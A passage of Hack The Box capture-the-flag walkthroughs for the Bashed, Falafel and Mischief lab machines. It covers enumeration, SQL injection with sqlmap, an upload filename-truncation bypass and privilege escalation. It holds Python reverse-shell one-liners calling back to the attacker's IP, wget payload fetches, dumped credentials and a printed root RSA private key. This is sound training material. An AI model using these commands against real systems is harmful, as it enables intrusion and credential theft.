|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds

Next, we use wfuzz to enumerate the directories and found some important directories such as /dev

c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt http://10.10.10.68/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.68/FUZZ
Total requests: 220560

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000001: C=200 161 L 397 W 7745 Ch "# directory-list-2.3-medium.txt"
000002: C=200 161 L 397 W 7745 Ch "#"
000003: C=200 161 L 397 W 7745 Ch "# Copyright 2007 James Fisher"
000018: C=404 9 L 32 W 279 Ch "2006"
000019: C=404 9 L 32 W 279 Ch "news"
000013: C=200 161 L 397 W 7745 Ch "#"
000014: C=200 161 L 397 W 7745 Ch ""
000015: C=404 9 L 32 W 280 Ch "index"
000016: C=301 9 L 28 W 311 Ch "images"
000017: C=404 9 L 32 W 283 Ch "download"
000020: C=404 9 L 32 W 280 Ch "crack"
000021: C=404 9 L 32 W 281 Ch "serial"
000022: C=404 9 L 32 W 280 Ch "warez"
000023: C=404 9 L 32 W 279 Ch "full"
000030: C=404 9 L 32 W 277 Ch "11"
Finishing pending requests...
c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt --hc=404 http://10.10.10.68/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.68/FUZZ
Total requests: 220560

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000001: C=200 161 L 397 W 7745 Ch "# directory-list-2.3-medium.txt"
000002: C=200 161 L 397 W 7745 Ch "#"
000003: C=200 161 L 397 W 7745 Ch "# Copyright 2007 James Fisher"
000013: C=200 161 L 397 W 7745 Ch "#"
000016: C=301 9 L 28 W 311 Ch "images"
000012: C=200 161 L 397 W 7745 Ch "# on atleast 2 different hosts"
000014: C=200 161 L 397 W 7745 Ch ""
000164: C=301 9 L 28 W 312 Ch "uploads"
000338: C=301 9 L 28 W 308 Ch "php"
000550: C=301 9 L 28 W 308 Ch "css"
000834: C=301 9 L 28 W 308 Ch "dev"
000953: C=301 9 L 28 W 307 Ch "js"
002771: C=301 9 L 28 W 310 Ch "fonts"
044769: C=
Finishing pending requests...

So when you will open /dev directory in the browser, you will get a link for phpbash.php. Click on that link.

It will redirect to the following page as shown below, which seems like a shell interacting through the browser.

After that, you can execute any os arbitrary command for testing whether it’s working or not. We have run ls command to check the present list in the current directory.

we execute the following command in phpbash

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.68: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 60876: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@bashed:/var/www/html/dev$ cd /home
cd /home
www-data@bashed:/home$ ls
ls
arrexel scriptmanager
www-data@bashed:/home$ cd arrexel
cd arrexel
www-data@bashed:/home/arrexel$ cat user.txt
cat user.txt
2c2*****fc1
www-data@bashed:/home/arrexel$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
www-data@bashed:/home/scriptmanager$ sudo -u scriptmanager bash -i
sudo -u scriptmanager bash -i
scriptmanager@bashed:~$ wget http://10.10.14.20/puckshell.py
wget http://10.10.14.20/puckshell.py
--2019-04-03 09:35:59-- http://10.10.14.20/puckshell.py
Connecting to 10.10.14.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 213 [text/plain]
Saving to: 'puckshell.py'

puckshell.py 100%[===================>] 213 --.-KB/s in 0s

2019-04-03 09:35:59 (30.4 MB/s) - 'puckshell.py' saved [213/213]
scriptmanager@bashed:~$ cp puckshell.py /scripts/puckshell.py
cp puckshell.py /scripts/puckshell.py
scriptmanager@bashed:~$ cd /scripts
cd /scripts
scriptmanager@bashed:/scripts$ ls -la
ls -la
total 20
drwxrwxr--  2 scriptmanager scriptmanager 4096 Apr  3 09:43 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager  213 Apr  3 09:43 puckshell.py
-rw-r--r--  1 scriptmanager scriptmanager    0 Apr  2 08:50 test.py
-rw-r--r--  1 scriptmanager scriptmanager   58 Apr  2 08:50 test.py.bak
-rw-r--r--  1 root          root            12 Apr  2 08:50 test.txt
scriptmanager@bashed:/scripts$ cat puckshell.py
cat puckshell.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);scriptmanager@bashed:/scripts$

catch it
C:\Users\jacco>nc -lvp 53
listening on [any] 53 ...
10.10.10.68: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 51794: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/root.txt
cc4*****8e2
#

Author: Jacco Straathof

HTB – Falafel

Today we are going to solve another CTF challenge “falafel” which is available online for those who want to increase their skill in penetration testing and black box testing. Falafel is a retired vulnerable lab presented by hack the box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to expert level.

Level: Hard

Task: find user.txt & root.txt file on the victim’s machine

Since these labs are online available therefore they have static IP and its IP is 10.10.10.73 so let’s begin with nmap port enumeration.

c:\Users\jacco>nmap -sC -sV 10.10.10.73
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-02 14:26 W. Europe Summer Time
Nmap scan report for 10.10.10.73
Host is up (0.030s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
| 256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_ 256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/*.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.67 seconds

So we explored target IP through the web browser and it put up a login page shown.

Enumeration

With the information we got from robots.txt, let’s brute-force for some .txt files that might give some juicy information

root@kali:~# wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hc 404 -t 60 http://10.10.10.73/FUZZ.txt
********************************************************
* Wfuzz 2.1.5 - The Web Bruteforcer                      *
********************************************************

Target: http://10.10.10.73/FUZZ.txt
Total requests: 207643

==================================================================
ID	Response   Lines      Word         Chars          Request    
==================================================================

01347:  C=200      1 L	       4 W	     30 Ch	  "robots"
06064:  C=200     17 L	     120 W	    804 Ch	  "cyberlaw"

Total time: 2430.657
Processed Requests: 207625
Filtered Requests: 207610
Requests/sec.: 85.41926

Let’s check cyberlaw.txt

By reading this message, I conclude that there is an admin account and which is facing major security issue and an attacker can easily take over the website using an image upload feature. Moreover, there is some hint on the URL filter.

Then we could also fuzz for other usernames

root@kali:~/htb/falafel# wfuzz -c -w /usr/share/wordlists/wfuzz/others/names.txt --sc 200 -t 60 -d "username=FUZZ&password=PuckieStyle" http://10.10.10.73/login.php

********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.73/login.php
Total requests: 8607

==================================================================
ID Response Lines Word Chars Payload 
==================================================================

000003: C=200 102 L 657 W 7074 Ch "Aaron"
000004: C=200 102 L 657 W 7074 Ch "Aartjan"
000005: C=200 102 L 657 W 7074 Ch "Abagael"
000006: C=200 102 L 657 W 7074 Ch "Abagail"
000007: C=200 102 L 657 W 7074 Ch "Abahri"
^C
Finishing pending requests...

root@kali:~/htb/falafel# wfuzz -c -w /usr/share/wordlists/wfuzz/others/names.txt --hw 657 -t 60 -d "username=FUZZ&password=PuckieStyle" http://10.10.10.73/login.php

********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.73/login.php
Total requests: 8607

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000065:  C=200    102 L	     659 W	   7091 Ch	  "Admin"
001488:  C=200    102 L	     659 W	   7091 Ch	  "Chris"

Total time: 37.51125
Processed Requests: 8607
Filtered Requests: 8605
Requests/sec.: 229.4511

The next thing that we can try is see if there is a SQL injection vulnerability. For test it, we can insert the following string as username:

and we press login button with random password. The web page answer is: Wrong identification: admin, Bbut we have not insert “admin” in login form → there is SQL injection!

 

Exploiting Web Application Vulnerabilities

Then we make more efforts for SQL injection by using SQLMAP and used “Wrong identification” as a string to be passed at the time of login.

c:\SQLMAP>python sqlmap.py -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel --tables --batch
___
__H__
___ ___[(]_____ ___ ___ {1.2.11.19#dev}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[*] starting @ 14:59:45 /2019-04-02/

--snip--
back-end DBMS: MySQL 5
[14:59:46] [INFO] fetching tables for database: 'falafel'
[14:59:46] [INFO] fetching number of tables for database 'falafel'
[14:59:46] [INFO] resumed: 1
[14:59:46] [INFO] resumed: users
Database: falafel
[1 table]
+-------+
| users |
+-------+

[*] ending @ 14:59:46 /2019-04-02/
c:\SQLMAP>python sqlmap.py -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel -T users --dump --batch
___
__H__
___ ___[']_____ ___ ___ {1.2.11.19#dev}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[*] starting @ 15:01:18 /2019-04-02/

[15:01:18] [INFO] testing connection to the target URL
--snip--
do you want to crack them via a dictionary-based attack? [y/N/q] N
Database: falafel
Table: users
[2 entries]
+----+--------+----------+----------------------------------+
| ID | role | username | password |
+----+--------+----------+----------------------------------+
| 1 | admin | admin | 0e462096931906507119562988736854 |
| 2 | normal | chris | d4ee02a22fc872e36d9e3751ba72ddc8 |
+----+--------+----------+----------------------------------+

[*] ending @ 15:01:19 /2019-04-02/

As you can observe that the password hash for user admin is started with 0 and I don’t know much about this type of hash, so we look in the Google and notice link for Magic hashes.

As you can observe the highlighted md5 hash for the 32-bit string is same as above……………………….

With help of the following credential we login into admin dashboard and move to upload options.

Here we are trying to upload a php file named shell.php but it put an error “Bad extension “as shown

Thereafter we renamed it as shell.php.png and again try to upload.

Ohh! Yes, the file with .png extension get uploaded successfully inside /var/www/html/uploads hence we can to upload a malicious php file or any php backdoor with .png extension.

Spawning Shell

Let’s create a PHP payload for uploading into the web site.

As shown in the given image the PHP file is uploaded successfully inside /var/www/html/uploads.

 

Trying filenames with very long names, I noticed the web app truncates the filename saved on the disk to a maximum of 236 characters.With this logic we can create a file with a 240 chars filename with the last 8 characters set to “.php.png”. Due to the behavior of the web app, it will truncate the last four characters “.png” which will leave us with a file having a “.php” file extension.

Sample filename:

verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php.png

Let’s prepare a php reverse shell with a loooong,loooong file name and host it using python SimpleHTTPServer

Root@kali:~/htb/falafel# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.73 - - [02/Apr/2019 10:10:20] "GET /verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php.png HTTP/1.1" 200 -

Triggering the reverse shell via curl:

root@kali:~/htb/falafel# curl "http://10.10.10.73/uploads/0402-1710_61cb5b7a8480bfc4/verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php"

Netcat listener receiving the reverse shell connection:

root@kali:~/htb/falafel# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.73.
Ncat: Connection from 10.10.10.73:53576.
Linux falafel 4.4.0-112-generic #135-Ubuntu SMP Fri Jan 19 11:48:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
17:14:07 up 1 day, 16:59, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
yossi tty1 Mon00 40:59m 0.15s 0.09s -bash
moshe pts/0 10.10.14.20 15:21 1:52m 0.00s 0.00s -sh
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')" 
www-data@falafel:/$

We open passwd file and notice two system username i.e. yossi and moshe.

www-data@falafel:/$ cd /var/www/html
cd /var/www/html
www-data@falafel:/var/www/html$ ls
ls
assets cyberlaw.txt images login_logic.php style.php
authorized.php footer.php index.php logout.php upload.php
connection.php header.php js profile.php uploads
css icon.png login.php robots.txt
www-data@falafel:/var/www/html$ cat connection.php 
cat connection.php
<?php
define('DB_SERVER', 'localhost:3306');
define('DB_USERNAME', 'moshe');
define('DB_PASSWORD', 'falafelIsReallyTasty');
define('DB_DATABASE', 'falafel');
$db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
// Check connection
if (mysqli_connect_errno())
{
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
?>
www-data@falafel:/var/www/html$

This is MySQL configuration file for MySQL where username is moshe and password is falafelIsReallyTasty

With help of above credential we are trying to ssh login and after making successful login we found the user.txt file from inside /home/moshe

PS C:\Users\jacco> ssh moshe@10.10.10.73
moshe@10.10.10.73's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Tue Apr 2 15:21:50 2019 from 10.10.14.20
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
setterm: terminal xterm-256color does not support --blank
moshe@falafel:~$ ls
user.txt
moshe@falafel:~$ cat user.txt
c86*****9d3

After some more penetration, we enumerated the groups for user moshe and found that the user is in the video group. When we found uses as the member of the video group then for Privilege Escalation we need check frame-buffer device. Because this can lead a local user able to access a frame buffer device file (/dev/fb*) could possibly use this flaw to escalate their privileges on the system.

Let’s have the contents of /dev/fb0 with help of cat command to capture the framebuffer raw data inside /tmp directory as scree.raw

So we have captured the raw data inside /tmp, now you need to take the raw image and convert it to a standard image format say .png but we before that we need to find t the size, use the following command which will print the dimension……………..

Now enter the following command to convert raw data into a .png image format

Then we opened screen.png and got the following image which was showing password: MoshePlzStopHackingMe!for user Yossi.

With help of above-enumerated credential, we have made SSH login successfully and then run following command for getting SSH RSA key.

PS C:\Users\jacco> ssh yossi@10.10.10.73
yossi@10.10.10.73's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Tue Apr  2 15:16:20 2019 from 10.10.14.20
yossi@falafel:~$ groups
yossi adm disk cdrom dip plugdev lpadmin sambashare
yossi@falafel:~$ debugfs /dev/sda1
debugfs 1.42.13 (17-May-2015)
debugfs:  cat /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAyPdlQuyVr/L4xXiDVK8lTn88k4zVEEfiRVQ1AWxQPOHY7q0h
b+Zd6WPVczObUnC+TaElpDXhf3gjLvjXvn7qGuZekNdB1aoWt5IKT90yz9vUx/gf
v22+b8XdCdzyXpJW0fAmEN+m5DAETxHDzPdNfpswwYpDX0gqLCZIuMC7Z8D8Wpkg
BWQ5RfpdFDWvIexRDfwj/Dx+tiIPGcYtkpQ/UihaDgF0gwj912Zc1N5+0sILX/Qd
UQ+ZywP/qj1FI+ki/kJcYsW/5JZcG20xS0QgNvUBGpr+MGh2urh4angLcqu5b/ZV
dmoHaOx/UOrNywkp486/SQtn30Er7SlM29/8PQIDAQABAoIBAQCGd5qmw/yIZU/1
eWSOpj6VHmee5q2tnhuVffmVgS7S/d8UHH3yDLcrseQhmBdGey+qa7fu/ypqCy2n
gVOCIBNuelQuIAnp+EwI+kuyEnSsRhBC2RANG1ZAHal/rvnxM4OqJ0ChK7TUnBhV
+7IClDqjCx39chEQUQ3+yoMAM91xVqztgWvl85Hh22IQgFnIu/ghav8Iqps/tuZ0
/YE1+vOouJPD894UEUH5+Bj+EvBJ8+pyXUCt7FQiidWQbSlfNLUWNdlBpwabk6Td
OnO+rf/vtYg+RQC+Y7zUpyLONYP+9S6WvJ/lqszXrYKRtlQg+8Pf7yhcOz/n7G08
kta/3DH1AoGBAO0itIeAiaeXTw5dmdza5xIDsx/c3DU+yi+6hDnV1KMTe3zK/yjG
UBLnBo6FpAJr0w0XNALbnm2RToX7OfqpVeQsAsHZTSfmo4fbQMY7nWMvSuXZV3lG
ahkTSKUnpk2/EVRQriFjlXuvBoBh0qLVhZIKqZBaavU6iaplPVz72VvLAoGBANj0
GcJ34ozu/XuhlXNVlm5ZQqHxHkiZrOU9aM7umQkGeM9vNFOwWYl6l9g4qMq7ArMr
5SmT+XoWQtK9dSHVNXr4XWRaH6aow/oazY05W/BgXRMxolVSHdNE23xuX9dlwMPB
f/y3ZeVpbREroPOx9rZpYiE76W1gZ67H6TV0HJcXAoGBAOdgCnd/8lAkcY2ZxIva
xsUr+PWo4O/O8SY6vdNUkWIAm2e7BdX6EZ0v75TWTp3SKR5HuobjVKSht9VAuGSc
HuNAEfykkwTQpFTlmEETX9CsD09PjmsVSmZnC2Wh10FaoYT8J7sKWItSzmwrhoM9
BVPmtWXU4zGdST+KAqKcVYubAoGAHR5GBs/IXFoHM3ywblZiZlUcmFegVOYrSmk/
k+Z6K7fupwip4UGeAtGtZ5vTK8KFzj5p93ag2T37ogVDn1LaZrLG9h0Sem/UPdEz
HW1BZbXJSDY1L3ZiAmUPgFfgDSze/mcOIoEK8AuCU/ejFpIgJsNmJEfCQKfbwp2a
M05uN+kCgYBq8iNfzNHK3qY+iaQNISQ657Qz0sPoMrzQ6gAmTNjNfWpU8tEHqrCP
NZTQDYCA31J/gKIl2BT8+ywQL50avvbxcXZEsy14ExVnaTpPQ9m2INlxz97YLxjZ
FEUbkAlzcvN/S3LJiFbnkQ7uJ0nPj4oPw1XBcmsQoBwPFOcCEvHSrg==
-----END RSA PRIVATE KEY-----
debugfs:  cat /root/root.txt
23b*****fa1
debugfs:

HTB – Mischief

Today we are going to solve another CTF challenge “Mischief”. Mischief is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to their experience; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt file

Let’s start off with our nmap Aggressive scan to find out the open ports and services.

c:\Users\jacco>nmap -sV -sC 10.10.10.92
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 08:54 W. Europe Summer Time
Nmap scan report for 10.10.10.92
Host is up (0.028s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)
| 256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)
|_ 256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.33 seconds

But as you can observe that here we didn’t obtain much information, therefore further I scan for UDP port and from its result we got port 161 is open for SNMP.

c:\Users\jacco>nmap -sU 10.10.10.92
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 08:57 W. Europe Summer Time
Nmap scan report for 10.10.10.92
Host is up (0.029s latency).
Not shown: 999 open|filtered ports
PORT STATE SERVICE
161/udp open snmp

Nmap done: 1 IP address (1 host up) scanned in 34.87 seconds

Because we were knowing SNMP service is enable in the network, therefore I run nmap script command for SNMP enumeration.

root@kali:~/htb/mischief# nmap -p161 -sC -sV -sU 10.10.10.92
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 03:03 EDT
Nmap scan report for 10.10.10.92
Host is up (0.028s latency).

PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: b6a9f84e18fef95a00000000
| snmpEngineBoots: 19
|_ snmpEngineTime: 9h48m31s
| snmp-interfaces: 
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 0.00 Kb sent, 0.00 Kb received
| Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)
| IP address: 10.10.10.92 Netmask: 255.255.255.0
| MAC address: 00:50:56:b9:80:1c (VMware)
| Type: ethernetCsmacd Speed: 1 Gbps
|_ Traffic stats: 2.17 Mb sent, 1.58 Mb received
| snmp-netstat: 
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:3366 0.0.0.0:0
| TCP 10.10.10.92:22 10.10.14.20:15739
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.53:53 0.0.0.0:0
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:42621 *:*
|_ UDP 127.0.0.53:53 *:*
| snmp-processes: 
| 1: 
| Name: systemd
| Path: /sbin/init
| Params: maybe-ubiquity
| 2: 
| Name: kthreadd
--snip--
| 591: 
| Name: sh
| Path: /bin/sh
| Params: -c /home/loki/hosted/webstart.sh
| 594: 
| Name: sh
| Path: /bin/sh
| Params: /home/loki/hosted/webstart.sh
| 595: 
| Name: python
| Path: python
| Params: -m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/
| 617: 
| Name: sshd
| Path: /usr/sbin/sshd
| Params: -D
--snip--
|   zerofree-1.0.4-1; 0-01-01T00:00:00
|_  zlib1g-1:1.2.11.dfsg-0ubuntu2; 0-01-01T00:00:00
Service Info: Host: Mischief

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.55 seconds

Hmmm!! So here I found something very interesting and it looks like the login credential to be used as authentication to connect port 3366.

Let’s navigate to port 3366 in the web browser and enter the following credential.

Username: loki
Password: godofmischiefisloki

Here, we were welcomed by following web page where it was holding another credential. Let’s dig out another way to utilize this credential for login.

We use a python script called Enyx to find the ipv6 address of the target machine. You can get the script from this link.

root@kali:/opt# git clone https://github.com/trickster0/Enyx.git
Cloning into 'Enyx'...
remote: Enumerating objects: 70, done.
remote: Total 70 (delta 0), reused 0 (delta 0), pack-reused 70
Unpacking objects: 100% (70/70), done.
root@kali:/opt# cd Enyx/
root@kali:/opt/Enyx# python enyx.py 2c public 10.10.10.92
###################################################################################
# #
# ####### ## # # # # # #
# # # # # # # # # #
# ###### # # # ## ## #
# # # # # ## # # #
# ###### # ## ## # # #
# #
# SNMP IPv6 Enumerator Tool #
# #
# Author: Thanasis Tserpelis aka Trickster0 #
# #
###################################################################################


[+] Snmpwalk found.
Created directory: /var/lib/snmp/mib_indexes
[+] Grabbing IPv6.
[+] Loopback -> 0000:0000:0000:0000:0000:0000:0000:0001
[+] Unique-Local -> dead:beef:0000:0000:0250:56ff:feb9:801c
[+] Link Local -> fe80:0000:0000:0000:0250:56ff:feb9:801c
root@kali:/opt/Enyx#
root@kali:/opt/Enyx# nmap -6 dead:beef:0000:0000:0250:56ff:feb9:801c
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 03:07 EDT
Nmap scan report for dead:beef::250:56ff:feb9:801c
Host is up (0.034s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 17.38 seconds

So we navigate to the web browser and explore Target IPv6 address in the URL, it put a login page for command execution panel. So we try to login this page with the credential we found earlier but that wasn’t the valid credential.

Access Victim’s Shell

 

Further, I try brute force for username and successfully get login with the following combination:

Since it was Command Execution Panel where we can run arbitrary system commands, hence this was RCE which could be easily exploited and we can own reverse shell of the target machine.

But before that, you must know Ipv6 address of your local machine for addressing your IP as listening IP.

root@kali:/opt/Enyx# ifconfig tun0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.20 netmask 255.255.254.0 destination 10.10.14.20
inet6 dead:beef:2::1012 prefixlen 64 scopeid 0x0<global>
inet6 fe80::e0da:8b68:3f37:f906 prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 100 (UNSPEC)
RX packets 131 bytes 61874 (60.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 168 bytes 16553 (16.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

For the reverse shell, I use python reverse shellcode from pentestmonkey, and modify lhost IP from our IPv6 address. Since both nodes belong to IPv6, therefore we need a listener which can establish a reverse connection such as ncat, therefore we started ncat as the listener on port 443

root@kali:~/htb/mischief# nc -6 -lvnp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Connection from dead:beef::250:56ff:feb9:801c.
Ncat: Connection from dead:beef::250:56ff:feb9:801c:42176.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python3 -c "import pty; pty.spawn('/bin/bash')" 
www-data@Mischief:/var/www/html$

python reverse shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::1012",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

As soon we will execute the malicious python code, we will get a reverse connection via ncat  or nc6.exe from https://www.sphinx-soft.com/tools/index.html

Great!! You can observe that we have access to remote terminal and let’s try to find out user.txt file to complete our first task. We found the user.txt file in the /home/loki but unable to read it. Although, there was another interesting file “credentials” and here we found another credential.

c:\PENTEST>nc6 -lvp 443
listening on [::] 443 ...
Warning: forward host lookup failed for mischief.htb: h_errno 11004: NO_DATA
connect to [dead:beef:2::1012] from mischief.htb [dead:beef::250:56ff:feb9:801c] 42174: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@Mischief:/var/www/html$ cd /home/loki
cd /home/loki
www-data@Mischief:/home/loki$ ls
ls
credentials hosted user.txt
www-data@Mischief:/home/loki$ cat credentials
cat credentials
pass: lokiisthebestnorsegod

As port 22 was running, therefore we connect to the remote machine through ssh and successfully found user.txt file

PS C:\Users\jacco> ssh loki@10.10.10.92
loki@10.10.10.92's password:lokiisthebestnorsegod
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue Apr 2 07:20:54 UTC 2019

System load: 0.0 Processes: 115
Usage of /: 25.9% of 15.68GB Users logged in: 0
Memory usage: 43% IP address for ens33: 10.10.10.92
Swap usage: 0%


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.


Last login: Mon Apr 1 06:40:22 2019 from 10.10.14.20
loki@Mischief:~$ ls
credentials hosted user.txt
loki@Mischief:~$ cat user.txt
bf5*****060
loki@Mischief:~$ cat .bash_history
python -m SimpleHTTPAuthServer loki:lokipasswordmischieftrickery
exit
free -mt
ifconfig
cd /etc/
sudo su
su
exit
su root
ls -la
sudo -l
ifconfig
id
cat .bash_history
nano .bash_history
exit
find / -name root.txt
whoami
groups
su
exit
loki@Mischief:~$ su
-bash: /bin/su: Permission denied

While exploring more, I found .bash_history file where I found one more credential for root user but loki doesn’t have permission to execute switch user command.

